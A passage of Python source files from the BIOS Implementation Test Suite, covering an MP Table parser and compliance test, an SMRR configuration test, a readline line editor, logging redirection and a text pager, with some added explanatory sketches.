return inner_c.rdmsr(self.apicid)
def setter(inner_c, self, value):
inner_c(getattr(value, "value", value)).wrmsr(self.apicid)
setattr(MSRS, c.__name__, property(functools.partial(getter, c), functools.partial(setter, c)))
MSRS.addrs[c.addr] = c.__name__
return MSRS
```
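An illustrative subclass following the contract the classes above describe (a class-level `leaf`, `cpuidfield` descriptors, registration through `make_CPUIDS`). This only runs inside the BITS environment, where `bits.cpuid` exists; the field layout shown is the standard CPUID leaf 1 encoding:

```python
# Illustrative sketch (BITS-only; bits.cpuid must exist at runtime).
class LEAF_1(CPUID):
    """Basic CPUID leaf 1: version information."""
    leaf = 0x1
    stepping = cpuidfield(0, 3, 0, doc="Stepping ID")    # reg 0 = EAX
    model = cpuidfield(0, 7, 4, doc="Model")
    family = cpuidfield(0, 11, 8, doc="Family ID")

CPUIDS = make_CPUIDS([LEAF_1])
# cpuids = CPUIDS(apicid)      # then: cpuids.LEAF_1.family, cpuids[0x1], ...
```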
#### File: bits/python/bootmenu.py
```python
from __future__ import print_function
import bits
import ttypager
created_boot_menu = False
try:
import efi
boot_str = "{}-bit EFI".format(str(efi.ptrsize * 8))
have_efi = True
except ImportError as e:
boot_str = "32-bit BIOS"
have_efi = False
def generate_boot_menu():
global created_boot_menu, boot_str
if created_boot_menu:
return
cfg = ""
cfg += 'menuentry "{} boot detected" {{\n'.format(boot_str)
cfg += """ py 'import bootmenu; bootmenu.callback()'\n"""
cfg += '}\n'
if have_efi:
cfg += 'menuentry "Exit to EFI" {\n'
cfg += """ py 'import efi; efi.exit()'\n"""
cfg += '}\n'
bits.pyfs.add_static("bootmenu.cfg", cfg)
created_boot_menu = True
def callback():
with ttypager.page():
print("{} boot detected".format(boot_str))
print("Tests and other menu entries tailored for this environment")
```
#### File: bits/python/mptable.py
```python
from __future__ import print_function
import bits
import bitfields
import ctypes
import struct
import unpack
import testsuite
import ttypager
import sys
valid_address_ranges = [
(0x9FC00, 0x400),
(0xF0000, 0x10000),
]
bad_address_ranges = [
(0xE0000, 0x10000),
]
def find_mp_table():
if sys.platform == "BITS-EFI":
import efi
return efi.system_table.ConfigurationTableDict.get(efi.MPS_TABLE_GUID)
address_ranges = valid_address_ranges + bad_address_ranges
bda_address = 0x400
ebda_address = ctypes.c_uint16.from_address(bda_address + 0x14).value << 4
if ebda_address:
address_ranges.insert(0, (ebda_address, 0x400))
for address, size in address_ranges:
mem = bits.memory(address, size)
for offset in range(0, size, 16):
signature = (ctypes.c_char * 4).from_address(address + offset).value
if signature == "_MP_":
length = ctypes.c_ubyte.from_address(address + offset + 8).value
if length == 1:
csum = sum(map(ord, mem[offset:offset+16])) & 0xff
if csum == 0:
return address + offset
return None
class MPTable(unpack.Struct):
"""Find and decode the MP Table."""
def __new__(cls):
offset = find_mp_table()
if offset is None:
return None
mp = super(MPTable, cls).__new__(cls)
mp._floating_pointer_memory = bits.memory(offset, 0x10)
return mp
def __init__(self):
super(MPTable, self).__init__()
u = unpack.Unpackable(self._floating_pointer_memory)
self.add_field('floating_pointer', FloatingPointer(u))
self._base_header_memory = bits.memory(self.floating_pointer.physical_address_pointer, 44)
u = unpack.Unpackable(self._base_header_memory)
self.add_field('header', Header(u), "\n\n{!r}")
self._base_table_memory = bits.memory(self.floating_pointer.physical_address_pointer, self.header.base_table_length)
u = unpack.Unpackable(self._base_table_memory)
u.skip(44)
self.add_field('base_structures', unpack.unpack_all(u, _base_structures), unpack.format_each("\n\n{!r}"))
self._extended_table_memory = bits.memory(self.floating_pointer.physical_address_pointer + self.header.base_table_length, self.header.extended_table_length)
u = unpack.Unpackable(self._extended_table_memory)
self.add_field('extended_structures', unpack.unpack_all(u, _extended_structures), unpack.format_each("\n\n{!r}"))
class FloatingPointer(unpack.Struct):
def __init__(self, u):
super(FloatingPointer, self).__init__()
self.raw_data = u.unpack_peek_rest()
self.add_field('anchor_string', u.unpack_one("4s"))
self.add_field('physical_address_pointer', u.unpack_one("<I"))
self.add_field('length', u.unpack_one("B"))
self.add_field('spec_revision', u.unpack_one("B"))
self.add_field('checksum', u.unpack_one("B"))
self.add_field('mp_feature_info_1', u.unpack_one("B"))
self.add_field('mp_feature_info_2', u.unpack_one("B"))
self.add_field('multiple_clock_sources', bool(bitfields.getbits(self.mp_feature_info_2, 6)), "mp_feature_info_2[6]={}")
self.add_field('imcrp_present', bool(bitfields.getbits(self.mp_feature_info_2, 7)), "mp_feature_info_2[7]={}")
self.add_field('mp_feature_info_3', u.unpack_one("B"))
self.add_field('mp_feature_info_4', u.unpack_one("B"))
self.add_field('mp_feature_info_5', u.unpack_one("B"))
if not u.at_end():
self.add_field('data', u.unpack_rest())
class Header(unpack.Struct):
def __init__(self, u):
super(Header, self).__init__()
self.raw_data = u.unpack_peek_rest()
self.add_field('signature', u.unpack_one("4s"))
self.add_field('base_table_length', u.unpack_one("<H"))
self.add_field('spec_revision', u.unpack_one("B"))
self.add_field('checksum', u.unpack_one("B"))
self.add_field('oem_id', u.unpack_one("8s"))
self.add_field('product_id', u.unpack_one("12s"))
self.add_field('oem_table_pointer', u.unpack_one("<I"))
self.add_field('oem_table_size', u.unpack_one("<H"))
self.add_field('entry_count', u.unpack_one("<H"))
self.add_field('local_apic_address', u.unpack_one("<I"))
self.add_field('extended_table_length', u.unpack_one("<H"))
self.add_field('extended_table_checksum', u.unpack_one("B"))
u.skip(1) # reserved byte
if not u.at_end():
self.add_field('data', u.unpack_rest())
class MpBaseStructure(unpack.Struct):
def __new__(cls, u):
t = u.unpack_peek_one("B")
if cls.mp_structure_type is not None and t != cls.mp_structure_type:
return None
return super(MpBaseStructure, cls).__new__(cls)
def __init__(self, u):
super(MpBaseStructure, self).__init__()
self.start_offset = u.offset
entry_type = u.unpack_peek_one("B")
if entry_type == 0:
length = 20
else:
length = 8
self.u = u.unpack_unpackable(length)
self.raw_data = self.u.unpack_peek_rest()
self.add_field('entry_type', self.u.unpack_one("B"))
self.add_field('length', length)
def fini(self):
if not self.u.at_end():
self.add_field('data', self.u.unpack_rest())
del self.u
class Processor(MpBaseStructure):
mp_structure_type = 0
def __init__(self, u):
super(Processor, self).__init__(u)
u = self.u
self.add_field('local_apic_id', u.unpack_one("B"))
self.add_field('local_apic_version', u.unpack_one("B"))
self.add_field('cpu_flags', u.unpack_one("B"))
self.add_field('enable', bool(bitfields.getbits(self.cpu_flags, 0)), "cpu_flags[0]={}")
self.add_field('bsp', bool(bitfields.getbits(self.cpu_flags, 1)), "cpu_flags[1]={}")
self.add_field('cpu_signature', u.unpack_one("<I"))
self.add_field('feature_flags', u.unpack_one("<I"))
self.add_field('reserved', u.unpack_one("<Q"))
self.fini()
class Bus(MpBaseStructure):
mp_structure_type = 1
def __init__(self, u):
super(Bus, self).__init__(u)
u = self.u
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('bus_type', u.unpack_one("6s"))
self.fini()
class IOApic(MpBaseStructure):
mp_structure_type = 2
def __init__(self, u):
super(IOApic, self).__init__(u)
u = self.u
self.add_field('io_apic_id', u.unpack_one("B"))
self.add_field('io_apic_version', u.unpack_one("B"))
self.add_field('io_apic_flags', u.unpack_one("B"))
self.add_field('enable', bool(bitfields.getbits(self.io_apic_flags, 0)), "io_apic_flags[0]={}")
self.add_field('io_apic_address', u.unpack_one("<I"))
self.fini()
_int_types = {
0: 'INT',
1: 'NMI',
2: 'SMI',
3: 'ExtINT',
}
_polarity = {
0b00: 'Conforms to specifications of bus (for example, EISA is active-low for level-triggered interrupts)',
0b01: 'Active high',
0b10: 'Reserved',
0b11: 'Active low',
}
_trigger_modes = {
0b00: "Conforms to specifications of bus (for example, ISA is edge-triggered)",
0b01: "Edge-triggered",
0b10: "Reserved",
0b11: "Level-triggered",
}
class IOInterrupt(MpBaseStructure):
mp_structure_type = 3
def __init__(self, u):
super(IOInterrupt, self).__init__(u)
u = self.u
self.add_field('interrupt_type', u.unpack_one("B"), unpack.format_table("{}", _int_types))
self.add_field('io_interrupt_flags', u.unpack_one("B"))
self.add_field('polarity', bitfields.getbits(self.io_interrupt_flags, 1, 0), unpack.format_table("io_interrupt_flags[1:0]={}", _polarity))
self.add_field('trigger', bitfields.getbits(self.io_interrupt_flags, 3, 2), unpack.format_table("io_interrupt_flags[3:2]={}", _trigger_modes))
u.skip(1)
self.add_field('source_bus_id', u.unpack_one("B"))
self.add_field('source_bus_irq', u.unpack_one("B"))
self.add_field('destination_io_apic_id', u.unpack_one("B"))
self.add_field('destination_io_apic_int_pin', u.unpack_one("B"))
self.fini()
class LocalInterrupt(MpBaseStructure):
mp_structure_type = 4
def __init__(self, u):
super(LocalInterrupt, self).__init__(u)
u = self.u
self.add_field('interrupt_type', u.unpack_one("B"), unpack.format_table("{}", _int_types))
self.add_field('local_interrupt_flags', u.unpack_one("B"))
self.add_field('polarity', bitfields.getbits(self.local_interrupt_flags, 1, 0), unpack.format_table("local_interrupt_flags[1:0]={}", _polarity))
self.add_field('trigger', bitfields.getbits(self.local_interrupt_flags, 3, 2), unpack.format_table("local_interrupt_flags[3:2]={}", _trigger_modes))
u.skip(1)
self.add_field('source_bus_id', u.unpack_one("B"))
self.add_field('source_bus_irq', u.unpack_one("B"))
self.add_field('destination_local_apic_id', u.unpack_one("B"))
self.add_field('destination_local_apic_lint_pin', u.unpack_one("B"))
self.fini()
class MpBaseStructureUnknown(MpBaseStructure):
mp_structure_type = None
def __init__(self, u):
super(MpBaseStructureUnknown, self).__init__(u)
self.fini()
_base_structures = [
Processor,
Bus,
IOApic,
IOInterrupt,
LocalInterrupt,
MpBaseStructureUnknown, # Must always come last
]
class MpExtendedStructure(unpack.Struct):
def __new__(cls, u):
t = u.unpack_peek_one("B")
if cls.mp_structure_type is not None and t != cls.mp_structure_type:
return None
return super(MpExtendedStructure, cls).__new__(cls)
def __init__(self, u):
super(MpExtendedStructure, self).__init__()
self.start_offset = u.offset
entry_type, entry_length = u.unpack_peek("BB")
self.u = u.unpack_unpackable(entry_length)
self.raw_data = self.u.unpack_peek_rest()
self.add_field('entry_type', self.u.unpack_one("B"))
self.add_field('entry_length', self.u.unpack_one("B"))
def fini(self):
if not self.u.at_end():
self.add_field('data', self.u.unpack_rest())
del self.u
class SystemAddressSpaceMapping(MpExtendedStructure):
mp_structure_type = 128
def __init__(self, u):
super(SystemAddressSpaceMapping, self).__init__(u)
u = self.u
_address_types = {
0: "I/O address",
1: " Memory address",
2: "Prefetch address",
}
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('address_type', u.unpack_one("B"), unpack.format_table("{}", _address_types))
self.add_field('address_base', u.unpack_one("<Q"))
self.add_field('address_length', u.unpack_one("<Q"))
self.fini()
class BusHierachyDescriptor(MpExtendedStructure):
mp_structure_type = 129
def __init__(self, u):
super(BusHierachyDescriptor, self).__init__(u)
u = self.u
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('bus_info', u.unpack_one("B"))
self.add_field('subtractive_decode', bool(bitfields.getbits(self.bus_info, 0)), "bus_info[0]={}")
self.add_field('parent_bus', u.unpack_one("B"))
u.skip(3)
self.fini()
class CompatibilityBusAddressSpaceModifier(MpExtendedStructure):
mp_structure_type = 130
def __init__(self, u):
super(CompatibilityBusAddressSpaceModifier, self).__init__(u)
u = self.u
self.add_field('bus_id', u.unpack_one("B"))
self.add_field('address_modifier', u.unpack_one("B"))
self.add_field('predefined_list_subtracted', bool(bitfields.getbits(self.address_modifier, 0)), "address_modifier[0]={}")
self.add_field('predefined_range_list', u.unpack_one("<I"))
self.fini()
class MpExtendedStructureUnknown(MpExtendedStructure):
mp_structure_type = None
def __init__(self, u):
super(MpExtendedStructureUnknown, self).__init__(u)
self.fini()
_extended_structures = [
SystemAddressSpaceMapping,
BusHierachyDescriptor,
CompatibilityBusAddressSpaceModifier,
MpExtendedStructureUnknown, # Must always come last
]
def dump_raw():
try:
mp = MPTable()
s = "MP Table -- Raw bytes and structure decode.\n\n"
if mp:
s += str(mp.floating_pointer) + '\n'
s += bits.dumpmem(mp._floating_pointer_memory) + '\n'
s += str(mp.header) + '\n'
s += bits.dumpmem(mp._base_header_memory) + '\n'
for base_struct in mp.base_structures:
s += str(base_struct) + '\n'
s += bits.dumpmem(base_struct.raw_data) + '\n'
if mp.header.extended_table_length:
for extended_struct in mp.extended_structures:
s += str(extended_struct) + '\n'
s += bits.dumpmem(extended_struct.raw_data) + '\n'
else:
s += "MP Table not found.\n"
ttypager.ttypager_wrap(s, indent=False)
except:
print("Error parsing MP Table information:")
import traceback
traceback.print_exc()
def dump():
try:
mp = MPTable()
s = "MP Table -- Structure decode.\n\n"
if mp:
s += str(mp)
else:
s += "MP Table not found.\n"
ttypager.ttypager_wrap(s, indent=False)
except:
print("Error parsing MP Table information:")
import traceback
traceback.print_exc()
def register_tests():
testsuite.add_test("MP Table", test_mptable)
def test_mptable():
"""Test the MP Table"""
mp = MPTable()
if mp is None:
return
addr = bits.memory_addr(mp._floating_pointer_memory)
for address, size in bad_address_ranges:
if addr >= address and addr < address + size:
bad_address = True
break
else:
bad_address = False
testsuite.test('MP Floating Pointer Structure at spec-compliant address', not bad_address)
testsuite.print_detail('Found MP Floating Pointer Structure at bad address {:#x}'.format(addr))
testsuite.print_detail('MP Floating Pointer Structure must appear at a 16-byte-aligned address')
testsuite.print_detail('located, in order of preference, in:')
testsuite.print_detail('- the first kilobyte of the EBDA')
testsuite.print_detail('- the last kilobyte of system base memory (639k to 640k)')
testsuite.print_detail('- the 0xF0000 to 0xFFFFF block')
```
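The detail lines printed by `test_mptable` pin down where the floating pointer structure may legally live. A minimal sketch of that check, assuming a fixed EBDA base for illustration only (BITS derives the real `bad_address_ranges` elsewhere in the file, and real firmware publishes the EBDA base in the BDA at physical address 0x40E):

```python
# Sketch of the spec-compliant search areas for the MP Floating Pointer
# Structure; the EBDA base below is an assumption for illustration.
ebda_base = 0x9FC00

good_ranges = [
    (ebda_base, 1024),     # first kilobyte of the EBDA
    (0x9FC00, 1024),       # last kilobyte of base memory (639k to 640k)
    (0xF0000, 0x10000),    # the 0xF0000 to 0xFFFFF block
]

def spec_compliant(addr):
    # must be 16-byte aligned and inside one of the preferred areas
    return addr % 16 == 0 and any(base <= addr < base + size
                                  for base, size in good_ranges)
```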
#### File: bits/python/readline.py
```python
import bits
import bits.input
import pager
import redirect
import string
import sys
__all__ = ["init", "get_completer", "set_completer", "parse_and_bind"]
width = []
height = []
line_x = []
line_y = []
buffer_max = 0
history = []
kill_ring = [] # Most recent last
kill_accumulate = False
ctrl_o_index = None
completer = None
def init():
"""Initialize the readline module and configure it as the Python readline callback."""
from _bits import _set_readline_callback
_set_readline_callback(_readline)
def insert_char(line_buffer, c, pos):
global buffer_max
if len(line_buffer) < buffer_max:
line_buffer = line_buffer[:pos] + c + line_buffer[pos:]
pos = pos + 1
return line_buffer, pos
def delete_char(line_buffer, pos):
if len(line_buffer) > 0:
line_buffer = line_buffer[:pos] + line_buffer[pos+1:]
return line_buffer, pos
def delete_char_left(line_buffer, pos):
if pos == 0:
return line_buffer, pos
line_buffer, temp_pos = delete_char(line_buffer, pos - 1)
return line_buffer, pos - 1
def insert_string(line_buffer, s, pos):
global buffer_max
chars_remaining = buffer_max - len(line_buffer)
if chars_remaining < len(s):
s = s[:chars_remaining]
line_buffer = line_buffer[:pos] + s + line_buffer[pos:]
insert_start = pos
pos = pos + len(s)
return line_buffer, insert_start, pos
def add_to_kill_ring(s, to_right):
global kill_ring, kill_accumulate
if kill_accumulate:
if to_right:
kill_ring[-1] = kill_ring[-1] + s
else:
kill_ring[-1] = s + kill_ring[-1]
else:
kill_ring.append(s)
kill_accumulate = True
def print_buffer(line_buffer, x, y, term):
global width, height, line_y
curr_pos = 0
while curr_pos < len(line_buffer):
bits.goto_xy(x, y, term)
max_width = width[term] - 1 - x
newline = False
if len(line_buffer) - curr_pos >= max_width:
partial_count = max_width
x = 0
y = y + 1
newline = True
else:
partial_count = len(line_buffer) - curr_pos
x = x + partial_count
bits.puts(line_buffer[curr_pos:curr_pos + partial_count], term)
if newline:
bits.puts('\n', term)
# check for scroll here and adjust start position
if y == height[term]:
y = y - 1
line_y[term] = line_y[term] - 1
curr_pos = curr_pos + partial_count
def PositionCursor(pos, x, y, term):
global width
curr_pos = 0
while curr_pos < pos:
max_width = width[term] - 1 - x
if pos - curr_pos >= max_width:
partial_count = max_width
x = 0
y = y + 1
else:
partial_count = pos - curr_pos
x = x + partial_count
curr_pos = curr_pos + partial_count
bits.goto_xy(x, y, term)
return(x, y)
def get_completer():
"""Get the readline completer function."""
global completer
return completer
def set_completer(f):
"""Set the readline completer function."""
global completer
completer = f
def parse_and_bind(s):
"""Stub parse_and_bind() function for compatibility with readline.
This module does not support readline's configuration syntax, so this
function does nothing."""
return None
key_hooks = {}
function_keys = set(getattr(bits.input, "KEY_F{}".format(n)) for n in range(1, 12+1))
def add_key_hook(key, func):
global key_hooks
assert key in function_keys
assert key_hooks.get(key) in (None, func)
key_hooks[key] = func
def _readline(prompt=""):
global width, height, line_x, line_y, buffer_max, history, kill_ring, kill_accumulate, ctrl_o_index, completer
with redirect.nolog():
with pager.nopager():
sys.stdout.write(prompt)
line_buffer = ''
pos = 0
prev_len = 0
term_count = bits.get_term_count()
width = [0] * term_count
height = [0] * term_count
line_x = [0] * term_count
line_y = [0] * term_count
for term in range(term_count):
width[term], height[term] = bits.get_width_height(term)
line_x[term], line_y[term] = bits.get_xy(term)
buffer_max = min((width[term] - 2 - line_x[term]) + ((height[term] - 1) * (width[term] - 1)) for term in range(term_count))
history_index = len(history)
history_state = dict()
completer_state = 0
last_yank_start = None
kill_accumulate = False
if ctrl_o_index is not None:
if ctrl_o_index < len(history):
history_index = ctrl_o_index
line_buffer = history[history_index]
pos = len(line_buffer)
ctrl_o_index = None
while True:
# Update history
history_state[history_index] = (line_buffer, pos)
try:
# clear any characters after the current line buffer
trailing_len = prev_len - len(line_buffer)
if trailing_len > 0:
for term in range(term_count):
trailing_x, trailing_y = PositionCursor(len(line_buffer), line_x[term], line_y[term], term)
print_buffer(" " * trailing_len, trailing_x, trailing_y, term)
prev_len = len(line_buffer)
for term in range(term_count):
# print the current line buffer
print_buffer(line_buffer, line_x[term], line_y[term], term)
# move the cursor to location of pos within the line buffer
PositionCursor(pos, line_x[term], line_y[term], term)
c = bits.input.get_key()
key = bits.input.key
def ctrl(k):
return key(k, ctrl=True)
# Reset states that depend on last key
if c != key('y', alt=True):
last_yank_start = None
if c not in (ctrl('k'), ctrl('u'), ctrl('w')):
kill_accumulate = False
if c == key('\r') or c == key('\n') or c == ctrl('o'):
if line_buffer or (history and history[-1]):
history.append(line_buffer)
if c == ctrl('o'): # Ctrl-O
ctrl_o_index = history_index + 1
sys.stdout.write('\n')
return line_buffer + '\n'
if not (c == key('\t') or c == ctrl('i')):
# reset completer state to force restart of the completer
completer_state = 0
if c == key(bits.input.KEY_HOME) or c == ctrl('a'):
# start of line
pos = 0
elif c == key(bits.input.KEY_LEFT) or c == ctrl('b'):
# left
if pos != 0:
pos -= 1
elif c == ctrl('d'):
# EOF
if len(line_buffer) == 0:
return ""
if pos < len(line_buffer):
line_buffer, pos = delete_char(line_buffer, pos)
elif c == key(bits.input.KEY_DELETE):
if pos < len(line_buffer):
line_buffer, pos = delete_char(line_buffer, pos)
elif c == key(bits.input.KEY_END) or c == ctrl('e'):
# end of line
pos = len(line_buffer)
elif c == key(bits.input.KEY_RIGHT) or c == ctrl('f'):
# right
if pos != len(line_buffer):
pos += 1
elif c == key('\b') or c == ctrl('h'):
# backspace
line_buffer, pos = delete_char_left(line_buffer, pos)
elif c == key('\t') or c == ctrl('i'):
# tab completion
if completer is not None:
if completer_state != 0:
for c in range(len(current_completion)):
line_buffer, pos = delete_char_left(line_buffer, pos)
else:
cur = pos
while pos != 0 and line_buffer[pos-1] != ' ':
pos -= 1
saved_str = line_buffer[pos:cur]
line_buffer = line_buffer[:pos] + line_buffer[cur:]
current_completion = completer(saved_str, completer_state)
completer_state += 1
if current_completion is not None:
for c in current_completion:
line_buffer, pos = insert_char(line_buffer, c, pos)
else:
for c in saved_str:
line_buffer, pos = insert_char(line_buffer, c, pos)
completer_state = 0
elif c == ctrl('k'):
# delete from current to end of line
killed_text = line_buffer[pos:]
line_buffer = line_buffer[:pos]
add_to_kill_ring(killed_text, to_right=True)
elif c == ctrl('l'):
# clear screen
bits.clear_screen()
sys.stdout.write(prompt)
for term in range(term_count):
                            line_x[term], line_y[term] = bits.get_xy(term)
elif c == key(bits.input.KEY_DOWN) or c == ctrl('n'):
# Next line in history
if history_index < len(history):
history_index += 1
if history_index == len(history):
line_buffer, pos = history_state.get(history_index, ('', 0))
else:
line_buffer, pos = history_state.get(history_index, (history[history_index], len(history[history_index])))
elif c == key(bits.input.KEY_UP) or c == ctrl('p'):
# Previous line in history
if history_index > 0:
history_index -= 1
line_buffer, pos = history_state.get(history_index, (history[history_index], len(history[history_index])))
elif c == ctrl('u'):
# delete from current to beginning of line
killed_text = line_buffer[:pos]
line_buffer = line_buffer[pos:]
pos = 0
add_to_kill_ring(killed_text, to_right=False)
elif c == ctrl(bits.input.KEY_LEFT):
# Move left by word
while pos != 0 and not line_buffer[pos-1].isalnum():
pos -= 1
while pos != 0 and line_buffer[pos-1].isalnum():
pos -= 1
elif c == ctrl(bits.input.KEY_RIGHT):
# Move right by word
end = len(line_buffer)
while pos != end and not line_buffer[pos].isalnum():
pos += 1
while pos != end and line_buffer[pos].isalnum():
pos += 1
elif c == ctrl('w'):
# delete previous word; note that this uses a different
# definition of "word" than Ctrl-Left and Ctrl-Right.
cur = pos
while pos != 0 and line_buffer[pos-1] == ' ':
pos -= 1
while pos != 0 and line_buffer[pos-1] != ' ':
pos -= 1
killed_text = line_buffer[pos:cur]
line_buffer = line_buffer[:pos] + line_buffer[cur:]
add_to_kill_ring(killed_text, to_right=False)
elif c == ctrl('y'):
# Yank
if kill_ring:
line_buffer, last_yank_start, pos = insert_string(line_buffer, kill_ring[-1], pos)
elif c == key('y', alt=True):
# If immediately after yank, rotate kill ring and yank
# the new top instead.
if last_yank_start is not None:
line_buffer = line_buffer[:last_yank_start] + line_buffer[pos:]
pos = last_yank_start
kill_ring.insert(0, kill_ring.pop()) # Rotate
line_buffer, last_yank_start, pos = insert_string(line_buffer, kill_ring[-1], pos)
elif c == ctrl('z') or c == key(bits.input.KEY_ESC):
if len(line_buffer) == 0:
return ""
elif c.key in key_hooks:
key_hooks[c.key]()
elif not(c.ctrl) and not(c.alt) and isinstance(c.key, basestring) and c.key in string.printable:
# printable
try:
line_buffer, pos = insert_char(line_buffer, c.key.encode('ascii'), pos)
except UnicodeError:
pass
else:
pass
except IOError:
pass
```
#### File: bits/python/redirect.py
```python
import bits as _bits
import bits.pyfs
import struct as _struct
import sys as _sys
import bitsversion
import contextlib
__all__ = ["redirect", "write_logfile", "clear", "log", "logonly", "nolog"]
NOLOG_STATE, LOGONLY_STATE, LOG_STATE = range(3)
state = LOG_STATE
class Tee(object):
"""Tee output to both input files provided."""
def __init__(self, out1, out2):
self.out1 = out1
self.out2 = out2
def write(self, data):
self.out1.write(data)
self.out2.write(data)
def flush(self):
self.out1.flush()
self.out2.flush()
# Create the log file
_log = bits.pyfs.pyfs_file("log")
def write_logfile(filename):
f = file(filename)
data, blocks = _bits.file_data_and_disk_blocks(f)
total_size = len(data)
logdata = _log.getvalue()[:total_size].ljust(total_size, "\n")
bytes_written = 0
for sector, offset, length in blocks:
chunk = logdata[bytes_written:bytes_written+length]
if chunk != data[bytes_written:bytes_written+length]:
_bits.disk_write(f, sector, offset, logdata[bytes_written:bytes_written+length])
bytes_written += length
def _log_header():
print >>_log, "BIOS Implementation Test Suite (BITS)"
print >>_log, "bits-{}, build ID {}".format(bitsversion.buildnum, bitsversion.buildid)
print >>_log
def redirect():
"""Redirect all screen outputs (stdout and stderr) to a log file.
Not to be called except as part of system initialization."""
global _orig_stdout, _orig_stderr
_log_header()
_orig_stdout = _sys.stdout
_orig_stderr = _sys.stderr
_sys.stdout = Tee(_orig_stdout, _log)
_sys.stderr = Tee(_orig_stderr, _log)
def clear():
"""Clear the log file."""
_log.truncate(0)
_log_header()
@contextlib.contextmanager
def _redirect_stdout(f):
old_stdout = _sys.stdout
try:
_sys.stdout = f
yield
finally:
_sys.stdout = old_stdout
@contextlib.contextmanager
def _redirect_stderr(f):
old_stderr = _sys.stderr
try:
_sys.stderr = f
yield
finally:
_sys.stderr = old_stderr
@contextlib.contextmanager
def log():
"""with log() sends stdout/stderr to both the screen and the log file"""
global state
saved_state = state
state = LOG_STATE
with _redirect_stdout(Tee(_orig_stdout, _log)):
with _redirect_stderr(Tee(_orig_stderr, _log)):
yield
state = saved_state
@contextlib.contextmanager
def logonly():
"""with logonly() sends stdout to the log only, and stderr to both screen and log"""
global state
saved_state = state
state = LOGONLY_STATE
with _redirect_stdout(_log):
with _redirect_stderr(Tee(_orig_stderr, _log)):
yield
state = saved_state
@contextlib.contextmanager
def nolog():
"""with nolog() sends stdout/stderr to the screen only"""
global state
saved_state = state
state = NOLOG_STATE
with _redirect_stdout(_orig_stdout):
with _redirect_stderr(_orig_stderr):
yield
state = saved_state
```
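A usage sketch for the three context managers above; it assumes the BITS runtime, where `redirect()` has already installed the `Tee` and saved the original streams:

```python
import redirect

with redirect.logonly():
    print("goes to the log file only (stderr still reaches the screen)")

with redirect.nolog():
    print("goes to the screen only, never recorded")

with redirect.log():
    print("default behaviour: screen and log file")
```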
#### File: bits/python/rlcompleter_extra.py
```python
def undercmp(s1, s2):
"""Compare two strings, sorting leading underscores last."""
if s1.startswith("_"):
if s2.startswith("_"):
return undercmp(s1[1:], s2[1:])
return 1
if s2.startswith("_"):
return -1
return cmp(s1, s2)
def attr_matches(self, text):
"""Compute matches when text contains a dot.
Assuming the text is of the form NAME.NAME....[NAME], and is
evaluatable in self.namespace, it will be evaluated and its attributes
(as revealed by dir()) are used as possible completions. (For class
instances, class members are also considered.)
WARNING: this can still invoke arbitrary C code, if an object
with a __getattr__ hook is evaluated.
"""
import re
m = re.match(r"([\w\[\]]+(\.[\w\[\]]+)*)\.(\w*)", text)
if not m:
return []
expr, attr = m.group(1, 3)
try:
thisobject = eval(expr, self.namespace)
except Exception:
return []
# get the content of the object, except __builtins__
words = dir(thisobject)
if "__builtins__" in words:
words.remove("__builtins__")
if hasattr(thisobject, '__class__'):
words.append('__class__')
words.extend(rlcompleter.get_class_members(thisobject.__class__))
matches = []
n = len(attr)
for word in sorted(set(words), cmp=undercmp):
if word[:n] == attr and hasattr(thisobject, word):
val = getattr(thisobject, word)
word = self._callable_postfix(val, "%s.%s" % (expr, word))
matches.append(word)
return matches
import readline
import rlcompleter
Completer = rlcompleter.Completer
Completer.attr_matches = attr_matches
readline.set_completer(Completer().complete)
```
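A small Python 2 sketch (the `cmp=` keyword above is Python 2 only) showing what `undercmp` does to completion ordering:

```python
names = ["_private", "public", "__dunder__", "other"]
# Leading underscores sort last, so private names trail the public ones:
print(sorted(names, cmp=undercmp))
# -> ['other', 'public', '_private', '__dunder__']
```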
#### File: bits/python/testsmrr.py
```python
import bits
import testmsr
import testsuite
def register_tests():
testsuite.add_test("SMRR configuration", test_smrr)
def test_smrr():
"""Test the SMRR-related configuration"""
cpus = sorted(bits.cpus())
if not testmsr.test_msr_consistency(text='IA32_MTRRCAP Bit [11] (SMRR Supported) must be consistent', first_msr=0xfe, shift=11, mask=1):
return
ia32_mtrrcap = bits.rdmsr(cpus[0], 0xfe)
if ia32_mtrrcap is not None and not ia32_mtrrcap & (1 << 11):
return
if testmsr.msr_available(0x1f2) and testmsr.msr_available(0x1f3):
MSR_SMRR_PHYS_BASE = 0x1f2
MSR_SMRR_PHYS_MASK = 0x1f3
elif testmsr.msr_available(0xa0) and testmsr.msr_available(0xa1):
MSR_SMRR_PHYS_BASE = 0xa0
MSR_SMRR_PHYS_MASK = 0xa1
else:
return
testmsr.test_msr_consistency(text='SMRR must be consistent across all processors', first_msr=MSR_SMRR_PHYS_BASE, last_msr=MSR_SMRR_PHYS_MASK)
for apicid in cpus:
smrr_physbase, smrr_physbase_str = testmsr.MSR('SMRR Physbase', apicid, MSR_SMRR_PHYS_BASE, 31, 12)
smrr_type, smrr_type_str = testmsr.MSR('SMRR Type', apicid, MSR_SMRR_PHYS_BASE, 2, 0)
smrr_physmask, smrr_physmask_str = testmsr.MSR('SMRR Physmask', apicid, MSR_SMRR_PHYS_MASK, 31, 12)
smrr_valid, smrr_valid_str = testmsr.MSR('SMRR Valid', apicid, MSR_SMRR_PHYS_MASK, 11, 11)
testsuite.test('SMRR_PHYSBASE must be aligned on an 8MB boundary', (smrr_physbase % 0x800) == 0)
testsuite.print_detail(smrr_physbase_str)
testsuite.print_detail('SMRR_PHYSBASE % 0x800 must be 0')
testsuite.test('SMRR Type must be Write-Back (Best performance)', smrr_type == 6)
testsuite.print_detail(smrr_type_str)
testsuite.print_detail('SMRR Type must be 6')
testsuite.test('SMRR size must be at least 8MB', smrr_physmask >= 0x800)
testsuite.print_detail(smrr_physmask_str)
testsuite.print_detail('SMRR Physmask must be >= 0x800')
testsuite.test('SMRR Valid bit must be 1', smrr_valid)
testsuite.print_detail(smrr_valid_str)
```
#### File: bits/python/ttypager.py
```python
import bits
import bits.input
import contextlib
import itertools
import os
import os.path
import pager
import redirect
import string
import sys
import textwrap
from cStringIO import StringIO
def getpager():
return ttypager
def plain(text):
"""Remove boldface formatting from text."""
import re
return re.sub('.\b', '', text)
def ttypager(text):
"""Page through text on a text terminal."""
try:
import efi
import readline
efi_options = ["f to write file"]
except ImportError as e:
efi_options = []
lines = string.split(plain(text), '\n')
if redirect.state != redirect.NOLOG_STATE:
with redirect.logonly():
sys.stdout.write(string.join(lines, '\n') + '\n')
if redirect.state == redirect.LOGONLY_STATE:
